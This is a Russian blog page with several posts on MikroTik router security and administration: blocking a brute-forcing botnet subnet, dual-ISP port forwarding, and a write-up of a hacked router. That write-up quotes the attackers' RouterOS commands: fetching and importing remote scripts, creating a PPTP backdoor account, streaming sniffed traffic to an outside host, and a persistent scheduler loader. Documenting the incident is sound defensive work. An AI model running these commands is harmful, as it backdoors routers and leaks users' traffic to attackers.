Новые атаки GRE на VPN Микротик (pptp l2tp)

ХАЦКЕРЫ
Ботнет 92.63.194.0/24 GRE
Имея внешние ip адреса логах микротика периодически кто-то ломится. То в winbox, но он закрыт из вне, то в VPN. Сейчас капитально присосался какой-то ботнет с подсети 92.63.194.0/24
Что он делает?
Ломится подбирая нелепые логины, ну и ладно бы, но залипли установленные соединения и удалить их нельзя -они восстанавливаются.
впн микротик атаки GRE
Вот зараза !
92.63.194.155
92.63.194.158
92.63.194.156
92.63.194.40
92.63.194.91
92.63.194.35
92.63.194.69
92.63.194.41
92.63.194.155
92.63.194.93
92.63.194.92
92.63.194.159
92.63.194.157
Что делать?
Сперва добавлять нижеприведённые правила и шиться последней прошивкой.
/ip firewall raw
add action=drop chain=prerouting src-address-list=Botlist
/ip firewall address-list
add address=92.63.194.0/24 list=Botlist

Теперь осталось только ждать новых и добавлять их в Botlist

Микротик и проброс портов в локальную сеть если два провайдера (два шлюза)

Интернет
Жил да был обычный Микротик, никого не трогал.
Но вот приключилась у него кручинушка.
Появился во втором порту новый провайдер лютый, да с внешним айпишником.
Вот тут то всё и закрутилось.


Имеется два приходящих канала от двух провайдеров с белыми ip адресами.
Требуется пробросить порт 80 до сервера в локальной сети так чтобы он был доступен по любому из каналов.
Суть проблемы заключается в том что шлюз по умолчанию один, пакет сам по себе не пойдёт куда надо, его надо научить ходить правильно и ровно.
Долго парился и наткнулся на правильную идею маркировать всё что движется, а что не движется — двигать и маркировать!

Читать дальше

Резервирование канала на Mikrotik

Интернет
После обновления Микротика до прошивки 6.42.6 (stable) перестали срабатывать скрипты привязанные к узлам Netwatch.
Нашлось временное решение убрать галочки в разрешениях скрипта, но полностью проблему не решило, так как глобальные переменные перестали быть глобальными и переключение канала в случае отвала больше не работало как раньше.
резервный канал на микротике
В тырнете на сайте serveradmin.ru взял первый попавшийся скрипт переключения канала на резерв в случае падения основного.
Понравилась идея, берём и модернизируем, добавляем что-то своё и удаляем что- то ненужное.
Читать дальше

После взлома микротик стал ПРОКСИ шпионом

Интернет
Следствия и Последствия взлома микротика
Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!
Микротик взломали!
Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.
В терминале посмотрел последние комманды
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"


из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
Читать дальше

Дополнительная защита микротик, бан dude connect from (додики)

Интернет

denied winbox/dude connect from

— данное сообщение в логах микротика возникает тогда, когда кто-то пытается получить доступ через WINBOX, но его ip адрес не прописан в сервисе winboxa. Т.е. этот вероятный злоумышленник или робот пытается получить доступ, а доступа нет. С одной стороны не стоит сразу паниковать и думать что Вас ломают, но если лезут значит надо принимать меры ещё на шаг раньше.

После неоднократных взломов Микротика и постоянно образующихся новых дыр в безопасности устройства решил собрать список негодяев пытающихся заломиться через winbox несмотря на то что сервис открыт только для определённых ip адресов. Все эти негодяи попадают в логи с сообщениями
denied winbox/dude connect from

Читать дальше

на 1 августа 2018 Более 200 000 маршрутизаторов MikroTik заражены

Интернет
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
микротик взломан майнинг
Читать дальше